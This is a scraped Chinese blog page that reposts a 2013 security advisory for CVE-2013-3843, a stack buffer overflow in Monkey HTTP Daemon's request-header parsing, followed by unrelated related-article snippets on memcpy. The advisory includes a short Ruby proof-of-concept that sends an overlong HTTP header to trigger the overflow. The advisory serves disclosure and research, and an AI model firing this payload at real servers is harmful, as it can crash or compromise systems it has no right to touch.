linux非cache区memcpy太慢,Monkey HTTP Daemon 'memcpy()'函数缓冲区溢出漏洞

最新推荐文章于 2022-09-14 13:17:58 发布

weixin_39828956

最新推荐文章于 2022-09-14 13:17:58 发布

阅读量158

点赞数

文章标签： linux非cache区memcpy太慢

发布日期：2013-06-04

更新日期：2013-06-08

受影响系统：

Monkey Monkey HTTP Daemon 1.x

描述：

--------------------------------------------------------------------------------

BUGTRAQ ID: 60333

CVE(CAN) ID: CVE-2013-3843

Monkey HTTP Daemon是适用于GNU/Linux的轻量级Web服务器。

Monkey HTTP Daemon 1.2.0及其他版本在解析请求时， "mk_request_header_process()"函数(src/mk_request.c)中存在栈缓冲区溢出漏洞。

链接：http://secunia.com/advisories/53697/

http://bugs.monkey-project.com/ticket/182

测试方法：

--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/env ruby

require "socket"

host = "localhost"

port = 2001

s = TCPSocket.open(host, port)

buf = "GET / HTTP/1.1\r\n"

buf << "Host: " + "\r\n"

buf << "localhost\r\n"

buf << "Bad: "

buf << "A" * 2511

buf << "B" * 4

s.puts(buf)

建议：

--------------------------------------------------------------------------------

厂商补丁：

Monkey

------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://monkey-project.com/

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_39828956

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

linux非cache区memcpy太慢,如何阻止gcc优化这个逐字节复制到memcpy调用中?

weixin_39572442的博客

05-25

466

我有这个密码memcpy作为标准C库实现的一部分,它从src到dest一次一个字节:void *memcpy(void *restrict dest, const void *restrict src, size_t len){char *dp = (char *restrict)dest;const char *sp = (const char *restrict)src;while( len-...

模拟实现memcpy

Hanani_Jia的博客

01-06

805

这次我来模拟实现的是memcpy库函数。其实发现这个函数和之前写的strcpy很像，但是最明显的区别就是这个函数他需要三个参数而strcpy则是两个参数，那这两个到底有什么区别呢？ memcpy和strcpy不同的是memcpy是一个按字符串拷贝的函数，因此传进来的第三个参数就是你要拷贝的字符串个数了 void *my_memcpy(void *det, const v

参与评论您还未登录，请先登录后发表或查看评论

[典型漏洞分享]一个典型的软件漏洞--memcpy导致的缓冲区溢出

weixin_30906425的博客

12-28

749

YS VTM模块存在缓冲区溢出漏洞，可导致VTM进程异常退出【高】问题描述： YS VTM模块开放对外监听端口（8554和8664），并从外部接收网络数据，中间模块调用到memcpy函数对网络数据进行拷贝，但该模块未正确对拷贝字节数进行判断，在使用Nessus对该模块进行扫描并传入超长字符串时会发生缓冲区溢出，并最终导致VTM进程异常退出。测试步骤： 1、...

linux非cache区memcpy太慢,在linux上但不是os x的memcpy分段错误

weixin_39759155的博客

05-25

408

我正在为文件作为类项目实现基于日志的文件系统.我有大量的工作在我的64位OS X笔记本电脑上,但当我尝试在CS部门的32位Linux机器上运行代码时,我得到一个seg错误.我们给出的API允许一次写入DISK_SECTOR_SIZE(512)字节.我们的日志记录包括用户想要写入的512字节以及一些元数据(他想要写入哪个扇区,操作类型等).总而言之,"记录"对象的大小为528字节,这意味着每个日志记...

整数安全漏洞

Z_hehe的博客

12-04

2692

整数安全漏洞整数的异常情况：1. 溢出：只有有符号数才会发生溢出；2. 回绕：无符号数0-1变成最大数；3. 截断：较大宽度的数存入一个宽度较小的数。溢出漏洞容易被植入shellcode。漏洞多发的函数：memcpy strncpy strcpy 整数溢出示例： 1. 整数转换：如果len被赋予了一个负数，则可以绕过检测，执行到memcpy，由于memcpy的第三个参数类型是size_t，无符号整数类型，...

Linux内存分页导致memcpy慢,SIMD指令优化memcpy函数

weixin_33322743的博客

05-03

1149

SIMD(Single Istruction Multiple Data), 即单条指令处理多个数据。是在通用处理器上对程序性能进行优化的利器，尤其在进行大量数据进行相同操作时，更能凸显优势，在Intel X86家族中主要有MMX/SSE/SSE2等指令集构成。memcpy函数即从源地址向目的地址复制一块数据，利用SIMD对其优化有很好的效果。如普通汇编指令 mov eax,ebx一次能复制两个字...

写远程缓冲区溢出漏洞利用程序

08-03

远程缓冲区溢出漏洞利用程序在这篇文章中，我们将讨论如何编写远程缓冲区溢出漏洞利用程序。我们将假设有一个有漏洞的服务器程序（vulnerable.c），然后编写一个exploit来利用该漏洞，从而获得一个远程shell。一...

C函数之memcpy()函数用法

12-22

函数原型　void *memcpy(void*dest， const void *src， size_t n); 　功能　由src指向地址为起始地址的连续n个字节的数据复制到以destin指向地址为起始地址的空间内。　头文件　#include 　返回值　...

缓冲区溢出实验.docx

06-23

【缓冲区溢出】是指程序在对内存缓冲区进行操作时，超过了其分配的界限，导致数据溢出并覆盖了相邻内存区域的数据。这种漏洞可能导致系统崩溃、数据丢失，甚至被攻击者利用来执行恶意代码。 ### 栈溢出原理栈溢出...

linux memcpy需要头文件,memcpy函数详解

weixin_35379749的博客

04-28

3599

说明：1.source和destin所指内存区域不能重叠，函数返回指向destin的指针。2.如果目标数组destin本身已有数据，执行memcpy()后，将覆盖原有数据(最多覆盖n)。如果要追加数据，则每次执行memcpy后，要将目标数组地址增加到你要追加数据的地址。3.memcpy 的操作对象不局限于某一类数据类型，或者说可适用于任意数据类型，只要能给出对象的起始地址和内存长度信息、并且对象具...

【C语言】memcpy字符串拷贝函数的陷井

徐腾腾的博客

05-14

3152

编程细节：memcpy memcpy拷贝的是字符串,如果拷贝字符数组，很有可能遇到\0元素，导致拷贝终止。所以Data中的数据很有可能不完整： BUF={12,AF,AB,1D,10,00,A1}； memcpy(Data,&BUF,sizeof(BUF)); Data={12,AF,AB,1D,10}；//丢失00和A1 ...

Linux内存uncache区域拷贝优化

非专业业余程序员

03-20

2276

1.概述内存非cache区域拷贝速度很慢，严重影响了系统性能，因此采用多种方法进行优化，主要有对齐拷贝、批量拷贝、减少循环次数、NEON拷贝方法。 2.高级SIMD和浮点寄存器介绍 2.NEON指令 2.1 VLDR VLDR指令可从内存中将数据加载到扩展寄存器中。 VLDR{<c>}{<q>}{.64} <Dd>, [<Rn> {, #+/-<imm>}] Encoding T1/A1, immediate form VLDR{<c

c++下memcpy()、memset()、memcmp()需要注意的

weixin_30757793的博客

08-03

2204

memcpy()、memset()、memcmp()等这些内存操作函数经常会帮我们完成一些数据复制、赋值等操作。因为在C语言中，无论是内置类型，还是自定义的结构类型（struct），其内存模型对于我们来说都是可知的、透明的。所以，我们可以对该对象的底层字节序列一一进行操作，简单而有效。代码片段如下所示： structSTUDENT { char_name[32]; ...

C语言中数据类型不一致导致安全性漏洞-memcpy()的参数 int 与 unsigned

ljg888的专栏

09-30

5116

//库函数memcpy()的声明 void *memcpy(void *dest, void *src, size_t n); //核心内存区域，拥有用户可访问的数据 #define KSIZE 1024 char kbuf[KSIZE]; //最多可以从核心内存中向用户内存区复制maxlen字节的数据 int copy_from_kernel(void *user_dest, int max

初探栈溢出

hongduilanjun的博客

09-14

957

HEVD全称为HackSys Extreme Vulnerable Drive，是一个项目，故意设计包含多种漏洞的驱动程序，旨在帮助安全爱好者来提升他们在内核层面的漏洞利用能力。说白了，是一个内核漏洞的靶场。项目地址：https://github.com/hacksysteam/HackSysExtremeVulnerableDriver关于安装配置初始环境，建议参考：这里就不再赘述。本人能力有限，刚学习过一些内核知识，文章中出现的任何错误欢迎师傅们批评指正。下面我们直接开始，从栈溢出开始。

Kali渗透测试：对软件的溢出漏洞进行测试

Liu_Bruce的博客

05-20

766

Kali渗透测试：对软件的溢出漏洞进行测试如何对一个软件进行渗透，渗透目标是FreeFloat FTP Server，这是一款十分简单的FTP服务器软件。FreeFloat FTP Server会在运行的主机上建立一个FTP服务器，其他计算机上的用户可以登录这个FTP服务器来存取文件。如我们在IP地址为192.168.68.160的主机的C盘中运行FreeFloat FTP Server,在另一台计算机中可以使用FTP下载工具或者命令的方式对其进行访问。这里我们采用命令的方式对其进行访问，如下图所示：

memcpy函数及其缺陷分析

星空_MAX

04-14

3205

函数介绍函数原型 void *memcpy(void *destin, void *source, unsigned n); 参数 destin-- 指向用于存储复制内容的目标数组，类型强制转换为 void* 指针。 source-- 指向要复制的数据源，类型强制转换为 void* 指针。 n-- 要被复制的字节数。返回值该函数返回一个指向目标存储区destin的指针。注意该函数的结尾是以'\0'判断的缺陷分析之一：区域重叠问题画个图就

理解缓冲区溢出：从入门到精通

防止缓冲区溢出的方法包括使用安全的编程技术，如限制字符串函数的长度，使用`fgets`代替`gets`，使用`memcpy`而非`strcpy`，以及启用编译器的溢出检查选项。此外，现代操作系统和编程语言也引入了如ASLR（地址空间...